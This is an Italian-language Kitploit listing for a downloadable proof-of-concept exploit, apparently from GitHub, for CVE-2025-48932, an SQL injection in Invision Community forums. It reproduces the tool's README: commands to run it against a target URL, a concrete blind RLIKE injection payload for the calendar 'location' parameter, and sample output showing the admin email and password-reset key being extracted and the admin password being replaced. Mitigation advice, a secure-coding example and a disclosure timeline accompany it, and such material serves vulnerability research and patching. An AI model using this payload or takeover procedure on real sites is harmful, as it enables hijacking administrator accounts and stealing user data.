Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-48932---exploit — Proof-of-concept exploit per CVE-2025-48932, un'iniezione SQL in Invision Community <= 4.7.20. Estrae le credenziali admin e reimposta le password tramite blind SQLi. Solo per test autorizzati. | Kitploit
Strumenti/GitHubGitHub/xploitgh0st/cve-2025-48932---exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubxploitgh0st/cve-2025-48932---exploit

CVE-2025-48932---exploit

Proof-of-concept exploit per CVE-2025-48932, un'iniezione SQL in Invision Community <= 4.7.20. Estrae le credenziali admin e reimposta le password tramite blind SQLi. Solo per test autorizzati.

Vedi Repository
210 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit di SQL Injection per Invision Community (CVE-2025-48932)

Python Version License CVE

Un exploit proof-of-concept che dimostra una vulnerabilità di SQL injection in Invision Community versioni <= 4.7.20.

⚠️ Disclaimer

Questo strumento è fornito SOLO per scopi educativi e di test di sicurezza autorizzati.

  • L'accesso non autorizzato a sistemi informatici è ILLEGALE
  • Usa questo strumento solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta al test
  • L'autore NON È RESPONSABILE di qualsiasi uso improprio o danno causato da questo strumento
  • Questo strumento è destinato esclusivamente a ricercatori di sicurezza, penetration tester e scopi educativi

📋 Indice

  • Descrizione della vulnerabilità
  • Requisiti
  • Installazione
  • Utilizzo
  • Come funziona
  • Mitigazione
  • Crediti
  • Riferimenti
  • 🔍 Descrizione della vulnerabilità

    CVE ID: CVE-2025-48932
    Gravità: Alta
    Punteggio CVSS: TBD
    Versioni interessate: Versioni di Invision Community 4.x precedenti alla 4.7.21

    La vulnerabilità è presente nello script /applications/calendar/modules/front/calendar/view.php. L'input utente passato attraverso il parametro di richiesta location nel metodo IPS\calendar\modules\front\calendar\view::search() non viene correttamente sanificato prima di essere utilizzato nelle query SQL.

    Ciò consente ad attaccanti remoti non autenticati di:

    • Estrarre dati sensibili dal database
    • Leggere le credenziali di amministratore
    • Riuscire potenzialmente a prendere il controllo dell'account amministratore

    Prerequisiti per lo sfruttamento:

    • L'applicazione Calendar deve essere installata
    • La funzionalità GeoLocalizzazione (come Google Maps) deve essere configurata

    Nota: Mentre le vulnerabilità di SQL injection nelle versioni di Invision Community 4.x < 4.7.18 potevano portare al takeover dell'account amministratore e alla RCE resettando la password dell'amministratore, la versione 4.7.18 ha introdotto una nuova chiave di crittografia di sicurezza nel meccanismo di reset della password, rendendo questo vettore d'attacco più difficile.

    📦 Requisiti

    • Python 3.7 o superiore
    • pip (gestore dei pacchetti Python)
    • Connessione Internet
    • Sistema target che esegue Invision Community <= 4.7.20 con:
      • Applicazione Calendar installata
      • Funzionalità GeoLocalizzazione configurata

    🚀 Installazione

    1. Clona il repository:

      root@kitploit:~
      git clone https://github.com/yourusername/invision-sqli-exploit.git
      cd invision-sqli-exploit
      
    2. Installa le dipendenze:

      root@kitploit:~
      pip install -r requirements.txt
      

    💻 Utilizzo

    Utilizzo base

    root@kitploit:~
    python invision-sqli-exploit.py -u http://target.com/forum/
    

    Modalità verbosa (per debug)

    root@kitploit:~
    python invision-sqli-exploit.py -u https://example.com/community/ -v
    

    Argomenti da riga di comando

    ArgomentoDescrizioneObbligatorio
    -u, --urlURL di base dell'installazione Invision CommunitySì
    -v, --verboseAbilita l'output verboso per il debugNo
    -h, --helpMostra il messaggio di aiuto ed esciNo

    Output di esempio

    root@kitploit:~
    ==================================================
    Invision Community <= 4.7.20 SQL Injection Exploit
    CVE-2025-48932
    ==================================================
    Target: http://example.com/forum/
    ==================================================
    
    [*] Fetching CSRF token...
    [+] CSRF token found: abc123def456...
    [*] Step 1: Extracting admin email address...
    [*] Extracting data: [email protected]
    [+] Admin email: [email protected]
    
    [!] Step 2: Manual action required!
    
    Please follow these steps:
    1. Navigate to: http://example.com/forum/index.php?/lostpassword/
    2. Request a password reset using email: [email protected]
    3. Press ENTER when done...
    
    [*] Step 3: Extracting password reset validation key...
    [*] Extracting data: xyz789abc123...
    [+] Reset key: xyz789abc123...
    [*] Step 4: Resetting admin password...
    
    ==================================================
    [+] EXPLOITATION SUCCESSFUL!
    ==================================================
    
    Admin credentials:
      Email:    [email protected]
      Password: Pwned1721234567
    
    You can now login at: http://example.com/forum/index.php?/login/
    

    🔬 Come funziona

    L'exploit funziona in quattro passaggi principali:

    1. Estrazione del token CSRF

    Lo script recupera prima un token CSRF dal sito target, necessario per le richieste successive.

    2. SQL injection blind basata su booleani

    Utilizzando un algoritmo di ricerca binaria, l'exploit estrae i dati dal database carattere per carattere:

    • Testa ogni carattere utilizzando query SQL condizionali
    • Usa la funzione RLIKE con pattern regex per rilevare condizioni vere/false
    • I messaggi di errore indicano condizioni riuscite

    3. Estrazione dell'email dell'amministratore

    Interroga la tabella core_members per estrarre l'indirizzo email dell'amministratore.

    4. Sfruttamento del reset della password

    • L'attaccante avvia manualmente un reset della password per l'account amministratore
    • L'exploit estrae la chiave di validazione del reset della password dal database
    • Usa la chiave di validazione per resettare la password dell'amministratore senza accesso all'email

    Dettagli tecnici

    Punto di iniezione:

    root@kitploit:~
    location parameter → calendar/view.php → search() method
    

    Esempio di payload:

    root@kitploit:~
    '))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#
    

    Tecnica di sfruttamento: SQL injection blind basata su booleani che utilizza la ricerca binaria per un'estrazione efficiente dei dati.

    🛡️ Mitigazione

    Per gli utenti

    Azioni immediate:

    1. Aggiorna alla versione 4.7.21 o successiva - Questa versione corregge la vulnerabilità
    2. Disattiva l'applicazione Calendar se non in uso
    3. Monitora i log di accesso per attività sospette
    4. Controlla gli account amministratore per accessi non autorizzati

    Per gli sviluppatori

    Pratiche di codifica sicura:

    1. Usa query parametrizzate/prepared statement - Non concatenare mai l'input utente nelle query SQL
    2. Validazione degli input - Valida e sanifica tutti gli input utente
    3. Principio del privilegio minimo - Gli utenti del database dovrebbero avere solo i permessi minimi necessari
    4. Web Application Firewall (WAF) - Implementa regole WAF per rilevare tentativi di SQL injection
    5. Audit di sicurezza regolari - Esegui revisioni periodiche del codice e penetration test

    Esempio di codice sicuro:

    root@kitploit:~
    // Vulnerable code
    $location = $_REQUEST['location'];
    $query = "SELECT * FROM events WHERE location = '$location'";
    
    // Secure code
    $location = $_REQUEST['location'];
    $query = $db->prepare("SELECT * FROM events WHERE location = ?");
    $query->execute([$location]);
    

    📅 Cronologia della divulgazione

    DataEvento
    16 maggio 2025Fornitore notificato
    27 maggio 2025Rilasciata la versione 4.7.21
    28 maggio 2025Richiesto l'identificativo CVE
    28 maggio 2025Assegnato CVE-2025-48932
    23 luglio 2025Divulgazione pubblica

    👏 Crediti

    Sviluppatore:

    • nanda

    Nota: Questa è un'implementazione indipendente basata sulle informazioni di vulnerabilità divulgate pubblicamente (CVE-2025-48932)

    📚 Riferimenti

    • Dettagli CVE-2025-48932
    • Sito ufficiale di Invision Community
    • EDB-ID: 52383

    📝 Licenza

    Questo progetto è concesso in licenza secondo i termini della MIT License - consulta il file LICENSE per i dettagli.

    🤝 Contributi

    I contributi sono benvenuti! Non esitare a inviare una Pull Request. Per modifiche importanti, apri prima una issue per discutere cosa vorresti cambiare.

    ⚖️ Avviso legale

    Questo strumento è distribuito sotto la MIT License. Utilizzando questo software, accetti di:

    1. Usarlo solo per scopi di test legali e autorizzati
    2. Assumerti piena responsabilità per le tue azioni
    3. Non ritenere l'autore responsabile per qualsiasi uso improprio o danno
    4. Rispettare tutte le leggi e normative applicabili

    Ricorda: L'accesso non autorizzato a sistemi informatici è un reato nella maggior parte delle giurisdizioni e può comportare gravi conseguenze legali.


    Se scopri una vulnerabilità di sicurezza, ti preghiamo di divulgarla responsabilmente al fornitore prima di renderla pubblica.

    Scarica lo strumento